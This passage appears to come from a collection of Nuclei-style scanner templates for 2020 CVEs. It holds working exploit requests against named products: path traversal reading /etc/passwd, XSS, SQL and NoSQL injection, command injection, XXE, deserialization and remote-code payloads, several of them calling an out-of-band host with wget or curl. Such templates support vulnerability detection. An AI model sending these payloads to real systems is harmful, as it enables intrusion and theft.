Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/awcuser/cgi-bin/vcs_access_file.cgi?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["application/x-download","filename=passwd"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-36510","info":{"name":"WordPress 15Zine <3.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/themes/15zine/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/themes/15zine/assets/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9043","info":{"name":"WordPress wpCentral <1.5.1 - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/index.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-login.php?action=logout&_wpnonce={{nonce}} HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-ajax.php?action=my_wpc_signon&auth_key={{authkey}} HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(header_4, 'text/html')","status_code_4 == 200","contains(body_4, 'wpCentral Connection Key')","contains(body_4, \"pagenow = \\'dashboard\\'\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"authkey","group":1,"regex":["style=\"word-wrap:break-word;\">([a-z0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"nonce","group":1,"regex":["_wpnonce=([0-9a-z]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-13158","info":{"name":"Artica Proxy Community Edition <4.30.000000 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15129","info":{"name":"Traefik - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"X-Forwarded-Prefix":"https://foo.nl"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"https://foo.nl/dashboard/\">Found</a>"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2020-25078","info":{"name":"D-Link DCS-2530L/DCS-2670L  - Administrator Password Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/config/getuser?index=0"],"matchers-condition":"and","matchers":[{"type":"word","words":["name=","pass="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25780","info":{"name":"Commvault CommCell - Local File Inclusion","severity":"high"},"requests":[{"method":"POST","path":["http://{{Host}}:81/SearchSvc/CVSearchService.svc"],"body":"<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:tem=\"http://tempuri.org/\">\n   <soapenv:Header/>\n   <soapenv:Body>\n      <tem:downLoadFile>\n         <tem:path>c:/Windows/system.ini</tem:path>\n      </tem:downLoadFile>\n   </soapenv:Body>\n</soapenv:Envelope>\n","headers":{"Cookie":"Login","soapaction":"http://tempuri.org/ICVSearchSvc/downLoadFile","content-type":"text/xml"},"matchers-condition":"and","matchers":[{"type":"word","words":["downLoadFileResult"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35598","info":{"name":"Advanced Comment System 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26919","info":{"name":"NETGEAR ProSAFE Plus - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /login.htm HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\nsubmitId=debug&debugCmd=wget+http://{{interactsh-url}}&submitEnd=\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-35774","info":{"name":"twitter-server Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/histograms?h=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&fmt=plot_cdf&log_scale=true"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8497","info":{"name":"Artica Pandora FMS <=7.42 - Arbitrary File Read","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pandora_console/attachment/pandora_chat.log.json.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"type\"","\"id_user\"","\"user_name\"","\"text\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27481","info":{"name":"Good Layers LMS Plugin <= 2.1.4 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=gdlr_lms_cancel_booking&id=(SELECT%201337%20FROM%20(SELECT(SLEEP(6)))MrMV)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, 'goodlayers-lms') || contains(body, 'goodlms')"],"condition":"and"}]}]},{"id":"CVE-2020-5776","info":{"name":"MAGMI - Cross-Site Request Forgery","severity":"high"},"requests":[{"raw":["POST /magmi/web/magmi_saveprofile.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nprofile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=\n","POST /magmi/web/magmi_run.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nengine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update\n","GET /magmi/web/info.php HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8641","info":{"name":"Lotus Core CMS 1.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page_slug=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11853","info":{"name":"Micro Focus Operations Bridge Manager <=2020.05 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ucmdb-api/connect"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["HttpUcmdbServiceProviderFactoryImpl","ServerVersion=11.6.0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8982","info":{"name":"Citrix ShareFile StorageZones <=5.10.x - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-28429","info":{"name":"geojson2kml - Command Injection","severity":"critical"},"requests":[{"raw":["POST /convert HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"fileName\": \"& echo \\\"{{randstr}}\\\" > {{filename}}.txt && ls\",\n  \"geoJsonData\": {\n    \"type\": \"FeatureCollection\",\n    \"features\": [\n      {\n        \"type\": \"Feature\",\n        \"geometry\": {\n          \"type\": \"Point\",\n          \"coordinates\": [102.0, 0.5]\n        },\n        \"properties\": {\n          \"prop0\": \"value0\"\n        }\n      }\n    ]\n  }\n}\n","GET /file/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{randstr}}"]},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8615","info":{"name":"Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=add_new_instructor&first_name={{firstname}}&last_name={{lastname}}&user_login={{user}}&email={{email}}&phone_number=1231231231&password={{pass}}&password_confirmation={{pass}}&tutor_profile_bio=Et+tempore+culpa+n&action=tutor_add_instructor\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type_2, \"application/json\")","contains(body_2, \"success\") && contains(body_2, \"true\") && contains(body_2, \"Instructor has been added successfully\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2020-11530","info":{"name":"WordPress Chop Slider 3 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout 10s\nGET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/javascript\")","contains(body, \"$(document).ready(function()\")"],"condition":"and"}]}]},{"id":"CVE-2020-11978","info":{"name":"Apache Airflow <=1.10.10 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /api/experimental/test HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"conf\": {\"message\": \"\\\"; touch test #\"}}\n","GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_4, \"operator\":\"BashOperator\")","contains(header_4, \"application/json\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"exec_date","group":1,"regex":["\"execution_date\":\"([0-9-A-Z:+]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-24589","info":{"name":"WSO2 API Manager <=3.1.0 - Blind XML External Entity Injection","severity":"critical"},"requests":[{"raw":["POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npayload=<%3fxml+version%3d\"1.0\"+%3f><!DOCTYPE+a+[+<!ENTITY+%25+xxe+SYSTEM+\"http%3a//{{interactsh-url}}\">%25xxe%3b]>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["Failed to install the generic artifact type"]}]}]},{"id":"CVE-2020-17519","info":{"name":"Apache Flink - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35847","info":{"name":"Agentejo Cockpit <0.11.2 - NoSQL Injection","severity":"critical"},"requests":[{"raw":["POST /auth/requestreset HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"user\": {\n    \"$func\": \"var_dump\"\n  }\n}\n","POST /auth/requestreset HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"user\": {\n    \"$func\": \"nonexistent_function\"\n  }\n}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body_1","regex":["string\\([0-9]{1,3}\\)(\\s)?\"([A-Za-z0-9-.@\\s-]+)\""]},{"type":"regex","part":"body_1","negative":true,"regex":["string\\([0-9]{1,3}\\)(\\s)?\"(error404)([A-Za-z0-9-.@\\s-]+)\""]},{"type":"regex","part":"body_2","negative":true,"regex":["string\\([0-9]{1,3}\\)(\\s)?\"([A-Za-z0-9-.@\\s-]+)\""]}]}]},{"id":"CVE-2020-29227","info":{"name":"Car Rental Management System 1.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page=/etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12447","info":{"name":"Onkyo TX-NR585 Web Interface - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27866","info":{"name":"NETGEAR - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Debug Enable!"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13379","info":{"name":"Grafana 3.0.1-7.0.1 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1","{{BaseURL}}/grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["cloudflare.com","dns"],"condition":"and"},{"type":"word","part":"header","words":["image/jpeg"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17456","info":{"name":"SEOWON INTECH SLC-130 & SLR-120S - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nbrowserTime=081119502020&currentTime=1597159205&expires=Wed%252C%2B12%2BAug%2B2020%2B15%253A20%253A05%2BGMT&Command=Submit&user=admin&password=admin\n","POST /cgi-bin/system_log.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nCommand=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5405","info":{"name":"Spring Cloud Config - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8772","info":{"name":"WordPress InfiniteWP <1.9.4.5 - Authorization Bypass","severity":"critical"},"requests":[{"raw":["GET /?author=1 HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Language: en-US,en;q=0.9\n","POST / HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: application/x-www-form-urlencoded\n\n_IWP_JSON_PREFIX_{{base64(\"{\\\"iwp_action\\\":\\\"add_site\\\",\\\"params\\\":{\\\"username\\\":\\\"{{username}}\\\"}}\")}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["wordpress_logged_in"]},{"type":"word","part":"body","words":["<IWPHEADER>"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username","group":1,"regex":["Author:(?:[A-Za-z0-9 -\\_=\"]+)?<span(?:[A-Za-z0-9 -\\_=\"]+)?>([A-Za-z0-9]+)<\\/span>"],"internal":true,"part":"body"},{"type":"regex","name":"username","group":1,"regex":["ion: https:\\/\\/[a-z0-9.]+\\/author\\/([a-z]+)\\/"],"internal":true,"part":"header"}]}]},{"id":"CVE-2020-24571","info":{"name":"NexusDB <4.50.23 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[extensions]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12259","info":{"name":"rConfig 3.9.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}&sublogin=1\n","GET /configDevice.php?rid=\"><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\") && contains(body_3, \"rConfig - Configuration Management\")","contains(content_type_3, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2020-27361","info":{"name":"Akkadian Provisioning Manager 4.50.02 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pme/media/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of /pme/media","Parent Directory"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19360","info":{"name":"FHEM 6.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17362","info":{"name":"Nova Lite < 1.3.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"body","words":["nova-lite"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24949","info":{"name":"PHP-Fusion 9.03.50 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/infusions/downloads/downloads.php?cat_id=${system(ls)}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["infusion_db.php"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5847","info":{"name":"UnRaid <=6.80 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20echo%20md5(%22CVE-2020-5847%22);%20?%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["b13928fbcfff659363d7c7d1ec008d56"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17506","info":{"name":"Artica Web Proxy 4.30 - Authentication Bypass/SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"],"host-redirects":true,"max-redirects":1,"matchers-condition":"and","matchers":[{"type":"word","words":["artica-applianc"]},{"type":"word","part":"header","words":["PHPSESSID"]},{"type":"status","status":[200,301,302],"condition":"or"}],"extractors":[{"type":"kval","kval":["PHPSESSID"]}]}]},{"id":"CVE-2020-10189","info":{"name":"ManageEngine Desktop Central Java Deserialization","severity":"critical"},"requests":[{"raw":["POST /mdm/client/v1/mdmLogUploader?udid=si%5C..%5C..%5C..%5Cwebapps%5CDesktopCentral%5C_chart&filename=logger.zip HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{generate_java_gadget(\"commons-collections3.1\",\"wget http://{{interactsh-url}}\",\"raw\")}}\n"],"matchers":[{"type":"status","status":[200],"internal":true}]},{"raw":["GET /cewolf/?img=%5Clogger.zip HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7107","info":{"name":"WordPress Ultimate FAQ <1.8.30 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/ultimate-faqs/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Ultimate FAQ","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/?Display_FAQ=%3C/script%3E%3Csvg/onload=alert(document.cookie)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'</script><svg/onload=alert(document.cookie)>","var Display_FAQ_ID ="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14882","info":{"name":"Oracle Weblogic Server - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://{{interactsh-url}}')"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["ADMINCONSOLESESSION"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-22211","info":{"name":"74cms - ajax_street.php 'key' SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5({{num}}),9%23"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-24391","info":{"name":"Mongo-Express - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /checkValid HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndocument=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F{{randstr}}.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++\n","GET /public/css/{{randstr}}.css HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body_3","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]}]}]},{"id":"CVE-2020-12256","info":{"name":"rConfig 3.9.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}&sublogin=1\n","GET /devicemgmt.php?deviceId=\"><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\") && contains(body_3, \"rConfig - Configuration Management\")","contains(content_type_3, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2020-7209","info":{"name":"LinuxKI Toolset <= 6.01 - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END;"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-28188","info":{"name":"TerraMaster TOS - Unauthenticated Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET /include/makecvs.php?Event=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1\nHost: {{Hostname}}\n","GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2020-12124","info":{"name":"WAVLINK WN530H4 live_api.cgi - Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/live_api.cgi?page={{str}}&id={{num}}&ip=;id;"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]},{"type":"word","part":"body","words":["WiFiBand"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11455","info":{"name":"LimeSurvey 4.1.11 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35986","info":{"name":"Rukovoditel <= 2.7.2 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_groups/users_groups&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-13942","info":{"name":"Apache Unomi <1.5.2 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/context.json"],"body":"{\n  \"filters\": [\n    {\n      \"id\": \"{{id}}\",\n      \"filters\": [\n        {\n          \"condition\": {\n            \"parameterValues\": {\n              \"nuclei\": \"script::Runtime.getRuntime().exec('id')\"\n            },\n            \"type\": 